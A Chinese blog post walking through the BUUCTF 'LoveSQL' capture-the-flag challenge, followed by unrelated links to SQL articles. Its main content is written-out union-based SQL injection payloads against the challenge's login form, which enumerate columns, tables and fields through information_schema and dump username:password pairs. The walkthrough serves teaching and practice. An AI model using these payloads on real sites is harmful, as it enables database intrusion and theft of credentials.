程序员经验分享-hwhale

【极客大挑战2019】LoveSQL解题

2023-11-16

1、打开靶机:BUUCTF在线评测,选择web---->【极客大挑战2019】LoveSQL

打开被测试站点,是这个样子的,是上一题EasySQL的延续。

2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下:

 直接给出了密码。

使用正确的用户名和密码登录一下,结果还是

 那使用MD5库碰撞一下,结果也没碰撞出来。

3、继续寻常注入吧。

爆破有多少列(字段数)

username=admin&password=6ec1cab790051296b99514856f25f48b' order by 3 %23 //不报错

username=admin&password=6ec1cab790051296b99514856f25f48b' order by 4 %23 //报错

 可知一共有3列。

爆破注入点

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,3 %23

爆破数据库

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,database() %23

爆破表名

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(table_name)  from information_schema.tables where table_schema=database()  %23  

 先爆表geekuser字段名

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(column_name)  from information_schema.columns where table_schema=database() and table_name='geekuser'   %23  

 在爆破表l0ve1ysq1字段

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(column_name)  from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'   %23  

两个表的字段,都是id,username,password

爆表geekuser数据

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(username,0x3a,password)  from geekuser   %23  

 结果不是我们想要的。

继续爆表l0ve1ysq1数据

username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(username,0x3a,password)  from l0ve1ysq1   %23  

 爆出flag。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

CTF

sql

数据库

database

【极客大挑战2019】LoveSQL解题 的相关文章

  • oracle sql中where条件的动态数量

    我需要为报告工具中的提示编写一条sql 我得到变量中用 分隔的多个值的列表 并且这些值的数量可以变化 例如1 abc def eg2 abc def xyz 现在我需要在oracle中编写这种形式的sql 逻辑上 select someth

  • Chrome 扩展 - 使用 javascript 定期运行并永久记录数据

    目前 我有一个脚本 当单击右上角托盘中的图像 仅适用于一个特定允许的网站 时 它会扫描 HTML 页面 然后输出一些值 此扫描和输出是单个 JS 文件中的函数 称为 checkData js 即使用户没有主动使用选项卡但它已打开 是否有可能

  • 在oracle sql中创建日期差异的自定义函数,排除周末和节假日

    我需要计算两个日期之间的天数decimal 不包括周末和节假日 by 使用自定义函数在 Oracle SQL 中 网站上也有类似的问题 然而 正如我所看到的 它们都没有要求使用自定义函数将输出作为十进制 我需要小数的原因是为了之后能够使用

  • 除了连接之外还有其他方法可以提高性能吗?

    除了连接之外还有其他方法可以提高性能吗 编辑 gbn 相关连接或相关子查询与存在子句哪个更好 https stackoverflow com questions 3305891 为什么没有人提到嵌套循环连接 这不是 JOIN 的 替代 方式

  • 具有数百万行的日志表。怎么办?

    我有一个包含数百万行的日志表 我正在考虑将数据分成多个表 即 LoginHistory ExceptionHistory PaymentProcessingHistory 等 在采用包含许多行 而不是列 的大型表并创建多个表时使用的术语是什

  • 在 Microsoft Access 中编写查询,字段描述错误 [关闭]

    Closed 这个问题不符合堆栈溢出指南 help closed questions 目前不接受答案 这个问题是由拼写错误或无法再重现的问题引起的 虽然类似的问题可能是on topic help on topic在这里 这个问题的解决方式不

  • 使用 Rails/ActiveRecord 覆盖旧数据库中列的名称或别名

    我正在针对旧数据库编写 Rails 应用程序 此旧数据库中的一个表有一个名为object id 很遗憾object id也是 Ruby 中每个对象的属性 因此当 ActiveRecord 尝试使用这些对象来制定查询时 它使用 Ruby 定义

  • 什么是“标量”查询?

    我正在使用 LLBLGEN 其中有一种方法可以将查询作为scalar query 谷歌搜索给了我一个定义scalar sub query 它们一样吗 标量查询是返回由一列组成的一行的查询

  • 如何检查 postgres 的 psql 是否自动提交

    我使用的是 postgres 9 5 如何检查自动提交是否打开或关闭 我试过SHOW AUTOCOMMIT我在哪里得到的ERROR unrecognized configuration parameter autocommit 然后我做了一

  • Codeigniter:无法使用提供的设置连接到数据库服务器

    我使用 codeigniter 作为 cms 框架 如果数据库主机名是 localhost 它可以正常工作 db default hostname localhost db default username root db default

  • 具有多个数据源 Oracle 和 H2 的 Spring Boot

    我为我的 Angular 项目开发了一个 Spring Boot RestController 并遇到了问题 在我的休息服务逻辑中 我使用了两个不同的数据库来获取数据 在这里您可以看到数据源配置 应用程序 属性 datasource1 sp

  • 两列上的唯一索引是否意味着每一列上都有一个索引?

    我的架构中有一个表 它对两列有唯一约束 UNIQUE Column1 Column2 SQlite 文档告诉我 这在这些列上创建唯一索引 http www sqlite org lang createtable html 我的问题是 这是否

  • MySql:将多项选择数据存储在数据库中

    我的表单中有一个复选框列表 用户可以选择其中任何一个 也可以选择全部 认为用户选择他感兴趣的运动类型 我需要最好的数据库结构来存储这个用户选择 这样 将来我就可以获得所有这些数据 我想 我无法将每个 用户 ID 运动 选择作为新行存储在数据

  • 修改SQL Server中的默认值

    我正在尝试使用 SQL Server 2008 中的 SQL 语句更改列的默认值 我在很多地方找到了如何在创建表 添加列时设置默认值 但没有找到如何设置它 一旦列已经存在就修改它 这就是我可以用来在添加时设置它的内容 ALTER TABLE

  • Oracle SQL - 将 oracle sql 中的 id 更新为按顺序排列

    我在 Oracle SQL 中有一个表 其 id 按递增顺序排列 但由于编辑原因 id 中存在间隙 例如id 目前类似于 22 23 24 32 33 44 etc 我想通过浏览表中的每一行并更新它们来修复这些差距 这样就不会有差距 最好的

  • MySQL 偏移无限行

    我想构造一个查询 显示表中的所有结果 但从表的开头偏移 5 据我所知 MySQLLIMIT需要一个限制和一个偏移量 有什么办法可以做到这一点吗 来自MySQL LIMIT 手册 http dev mysql com doc refman 5

  • 有没有由 HTML + css + javascript 驱动的 sql 编辑器? [关闭]

    Closed 这个问题正在寻求书籍 工具 软件库等的推荐 不满足堆栈溢出指南 help closed questions 目前不接受答案 语法高亮 sql代码格式 代码镜像 http codemirror net 会成功的 这太好了 非常容

  • 获取两个不同日期列的计数并按日期分组

    我有包含两个 DATE 列的表 TS customer 和 TS verified 我正在寻找一种方法来获取结果 在第一列中 我有某人创建用户 TS customer 或某人经过验证 TS verified 的日期 在第二列中 我希望 co

  • 如何从 SQL Server 的表中获取列名?

    我想查询一个表的所有列的名称 我发现如何做到这一点 Oracle https stackoverflow com q 452464 419956 MySQL https stackoverflow com q 193780 419956 P

  • 如何:SQL 还是 NOSQL?

    我还没有遇到过这个问题 但这就是我的想法 非常肤浅和简单化恕我直言 如果您有键值类型的存储 并且所有访问都是键查找 请使用 NOSQL 解决方案 如果您想要基于值 和子值 进行查找或者有一些更复杂的东西 例如联接 您会选择关系解决方案 事务

随机推荐

  • Java controller参数接收json字符串

    前后端分离以后 发现参数有时候需要统一 有时候前端传回来的参数格式不是我们controller方法参数需要的格式 个人感觉用对象接受能解决一些问题 假如前端传过来的json数据如下 loginCode 111111 postCode 111

  • vue项目中使用CDN引入

    前言 CDN 内容分发网络 指请求资源的方式 即通过script头去请求对应的脚本资源的一种方式 项目里配置之后不需要通过npm包管理工具去下载配置的包 目的 将引用的外部js css文件剥离开来 不编译到vendor js中 而是用资源的

  • uni-app 系列之(二)—— 项目简介

    uniCloud 云空间目录 阿里云为uniCloud aliyun 腾讯云为uniCloud tcb components 符合vue组件规范的uni app组件目录 comp a vue 可复用的a组件 utssdk 存放uts文件 p

  • vscode设置remote-ssh并免密登录

    1 在vscode中安装remote ssh插件 直接在vscode中搜索remote ssh即可安装 安装完成以后是这样 2 使用remote ssh远程登录ssh 按照下图标记依次点击1 2 3 就会出现remote ssh编辑界面 用

  • Jmeter系列-webdriver插件

    1 下载地址 JMeterPlugins WebDriver 1 1 2 2 将JMeterPlugins WebDriver 1 1 2 lib ext中的 jar拷贝到D apache jmeter 2 13 lib ext下 3 将J

  • 信息奥赛一本通1130:找第一个只出现一次的字符 C++ -------------- 信息奥赛一本通1407:笨小孩 C++

    1 原题 给定一个只包含小写字母的字符串 请你找到第一个仅出现一次的字符 如果没有 输出no 输入 一个字符串 长度小于100000 输出 输出仅出现一次的字符 若没有则输出no 输入样例 abcabd 输出样例 c 方法一 通俗易懂 2

  • 宝塔配置教程

    Socket connection established lighthouse VM 12 5 centos sudo etc init d bt default BT Panel default info 外网面板地址 http 101

  • 简单的 CNN 模型的代码实现(使用 Python 和 Keras 框架)

    深度学习是当前机器学习领域最热门的研究方向之一 其中最常用的网络结构之一就是卷积神经网络 Convolutional Neural Network CNN CNN 在图像识别 自然语言处理等领域有着广泛的应用 CNN 的基本结构包含卷积层

  • Vue项目proxyTable反向代理,开发环境与生产环境下服务接口地址的自动匹配

    Vue项目proxyTable反向代理 开发环境与生产环境下服务接口地址的自动匹配 应用场景 vue项目中 如果采用了proxyTable反向代理 解决开发环境下的后台服务跨页问题的话 在生产环境下时候服务的URL地址就会报错 原因解析 1

  • C#winform窗体实现对sql server数据库的增删改查

    1 运行效果截图 2 输入用户名 密码进行查询 查找成功则显示 查找不成功显示用户信息不存在 3 输入用户名与密码 向数据库中添加用户信息 添加后数据库表信息

  • Linux软锁cpu,记一次服务器内核软死锁(soft lockup)解决方案

    nogo benlux fc兵蜂 记一次服务器内核软死锁 soft lockup 解决方案 2020 08 02 05 34 28 程梦雨说娱乐 概述 简单记录下最近处理的一个内核软死锁 soft lockup 问题 仅供参考 1 检查系统

  • android在线图标生成工具,图标在线生成工具Android Asset Studio的使用

    在网站的导航资源里看到了一个非常好用的东西 Android Asset Studio 可以在线生成各种图标 之前一直在用一个叫做Android Icon Creator的插件 可以直接在Android Studio的插件里搜索 这个工具的优

  • MySQL----约束

    目录 一 前言 二 约束类型 三 约束使用的语法 3 1 主键约束 PRIMARY KEY 3 1 1 创建表时设置主键约束 3 1 2 修改表时添加主键约束 3 1 3 删除主键约束 3 2 唯一约束 UNIQUE 3 2 1 创建表时设

  • Linux:VirtualBox虚拟机下安装桌面版CentOS

    下载 VirtualBox 虚拟机 官网下载即可 https www virtualbox org wiki Downloads 选择合适的版本安装 下载 CentOS 镜像文件 华为云镜像站 红框指出的镜像文件 二选一即可 Minimal

  • 深度学习图像分类提升精度的11个技巧总结!

    点击上方 小白学视觉 选择加 星标 或 置顶 重磅干货 第一时间送达 来源丨大家好我是爱因 编辑丨极市平台 导读 计算机视觉主要问题有图像分类 目标检测和图像分割等 针对图像分类任务 提升准确率的方法路线有两条 一个是模型的修改 另一个是各

  • 蓝桥杯2019年第十届省赛真题-Fibonacci 数列与黄金分割

    题目 题目链接 题解 我未曾设想的道路 我居然以为是高精度的矩阵快速幂 差点心态崩了 直接看了题解 1 50 打个表 发现到20 小数点后八位就不变了 所以 解决 代码 include

  • 【浅谈 new 与 delete】

    目录 前言 new 与 delete 内置类型 自定义类型 operator new 与 operator delete new 和 delete 实现原理 定位new 总结 前言 打怪升级 第39天 在C语言中 我们动态申请内存的方法是使

  • python数据可视化学习-饼状图

    import numpy as np import matplotlib pyplot as plt labels A B C D fraces 15 30 45 10 plt pie x fraces labels labels plt

  • python从入门到放弃,学完python能做什么?

    首先python一门应用广泛的编程语言 所以无论是对于专业的程序员 还是从事其他工作的人 学会python都会增加自己的竞争力 那么 对于程序员或者其他职业的人 学会python具体都有些什么好处呢 一 如果程序员学会python 能做什么

  • 【极客大挑战2019】LoveSQL解题

    1 打开靶机 BUUCTF在线评测 选择web gt 极客大挑战2019 LoveSQL 打开被测试站点 是这个样子的 是上一题EasySQL的延续 2 EasySQL那道题采用万能密码 我们也直接使用万能密码试一下 结果如下 直接给出了密

热门标签